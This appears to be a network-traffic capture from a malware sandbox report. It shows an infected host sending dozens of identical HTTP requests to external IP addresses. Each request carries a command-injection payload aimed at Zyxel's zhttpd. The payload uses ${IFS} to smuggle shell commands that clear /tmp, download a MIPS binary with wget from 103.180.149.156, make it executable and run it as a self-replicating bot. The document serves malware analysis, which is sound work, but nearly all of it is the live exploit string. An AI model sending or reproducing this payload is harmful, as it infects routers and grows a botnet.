                                                      Feb 2, 2024 06:36:10.012474060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8699192.168.2.144254217.129.148.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012499094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8700192.168.2.144444498.3.32.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012531996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8701192.168.2.1438110199.26.217.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012581110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8702192.168.2.1453684165.66.73.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012638092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8703192.168.2.144477650.248.136.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012661934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8704192.168.2.143413249.82.75.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012691021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8705192.168.2.143649423.13.152.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012737036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8706192.168.2.145346081.2.8.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012763023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8707192.168.2.1454664212.4.208.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012813091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8708192.168.2.145355213.177.124.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012840986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8709192.168.2.1441398172.41.110.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012892008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8710192.168.2.144068479.219.193.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012921095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8711192.168.2.143895067.152.135.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012963057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8712192.168.2.1439782191.20.184.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:10.012991905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8713192.168.2.1455520209.143.152.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022769928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8714192.168.2.144006085.243.131.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022810936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8715192.168.2.1458524216.67.104.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022845984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8716192.168.2.1456778185.217.39.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022897005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8717192.168.2.1459060192.177.167.89443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022941113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8718192.168.2.1440868164.167.191.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.022981882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8719192.168.2.145620871.222.10.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023025036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8720192.168.2.1440946170.180.224.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023076057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8721192.168.2.1433112161.196.186.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023114920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8722192.168.2.1436980104.241.241.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023154974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8723192.168.2.145751243.139.158.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023191929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8724192.168.2.1460374223.115.176.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023205996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8725192.168.2.1436912163.66.53.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023241997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8726192.168.2.143902483.103.188.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023307085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8727192.168.2.1446076137.34.43.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023350954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8728192.168.2.144967860.227.148.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023399115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8729192.168.2.1456582101.227.182.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023437977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8730192.168.2.143292048.38.140.49443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023466110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8731192.168.2.143901449.242.37.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023495913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8732192.168.2.145329693.181.202.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023550034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8733192.168.2.1437232199.225.236.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023580074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8734192.168.2.144983041.44.163.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023621082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8735192.168.2.1457850212.17.102.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023662090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8736192.168.2.144634838.143.133.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023706913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8737192.168.2.1445586169.240.119.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023747921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8738192.168.2.1459106149.174.59.107443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023780107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8739192.168.2.1438658220.94.100.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023829937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8740192.168.2.1458582121.219.187.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023875952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8741192.168.2.1444092202.21.85.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023917913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8742192.168.2.143446890.103.145.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.023972034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8743192.168.2.146011052.0.146.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024017096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8744192.168.2.143877242.198.124.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024055004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8745192.168.2.145328025.5.167.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024089098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8746192.168.2.1448716182.21.172.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024118900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8747192.168.2.1451204101.14.62.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024184942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8748192.168.2.1443632137.70.185.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024221897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8749192.168.2.1437648190.216.134.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024266005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8750192.168.2.145669065.225.240.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024291039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8751192.168.2.146013024.160.21.184443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024323940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8752192.168.2.143605884.1.83.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024384022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8753192.168.2.1447448217.62.153.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024415016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8754192.168.2.1435434160.16.238.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024460077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8755192.168.2.1448722182.7.219.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024518967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8756192.168.2.1440470141.201.210.180443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024549007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8757192.168.2.1452516177.188.236.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024584055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8758192.168.2.14463169.44.155.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024631023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8759192.168.2.144550679.42.146.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024666071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8760192.168.2.1457306210.104.218.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:11.024704933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8761192.168.2.1449032212.97.133.161443
                                                      TimestampBytes transferredDirectionData
